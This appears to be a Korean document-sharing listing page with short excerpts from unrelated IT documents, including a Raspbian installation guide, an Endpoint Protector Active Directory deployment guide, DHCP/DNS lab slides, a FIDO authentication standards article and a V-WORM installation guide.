Raspbian 설치 라즈비안 OS (Raspbian OS) 라즈베리파이 3 Model B USB 마우스 USB 키보드 마이크로 SD 카드 마이크로 SD 카드리더기 HDM I 케이블모니터

Raspbian 설치 라즈비안 OS (Raspbian OS) 라즈베리파이 3 Model B USB 마우스 USB 키보드 마이크로 SD 카드 마이크로 SD 카드리더기 HDM I 케이블모니터 운영체제실습 Raspbian 설치 2017. 3 표월성 wspyo74@naver.com cherub.sungkyul.ac.kr 목차 Ⅰ. 설치 1. 라즈비안 (Raspbian 설치 ) 2. 설치후, 설정 설정사항 Raspbian 설치 라즈비안 OS (Raspbian OS) 라즈베리파이 3 Model B USB 마우스 USB 키보드 마이크로 SD 카드 마이크로

More information

Endpoint Protector - Active Directory Deployment Guide

Endpoint Protector - Active Directory Deployment Guide Version 1.0.0.1 Active Directory 배포가이드 I Endpoint Protector Active Directory Deployment Guide 목차 1. 소개...1 2. WMI 필터생성... 2 3. EPP 배포 GPO 생성... 9 4. 각각의 GPO 에해당하는 WMI 연결... 12 5.OU 에 GPO 연결... 14 6. 중요공지사항

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 DHCP & DNS 조성현 목차 DHCP LAB CHROOT DNS Primary (DNS LAB) Secondary RNDC RNDC 원격 2 DHCP LAB DHCP LAB(1) IP 주소할당 C-Class 의사설네트워크중 10 번째사설네트워크를사용 체크해제 Gateway IP 변경 C 클래스사설아이피대역대 (192.168.0.0~192.168.255.255)

More information

TTA Journal No.157_서체변경.indd

TTA Journal No.157_서체변경.indd 표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH

More information

Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL: E-M

Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL:   E-M Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL: http://www.olivetech.co.kr E-Mail: tech@olivetech.co.kr TEL: 031-726-4217 FAX: 031-726-4219

More information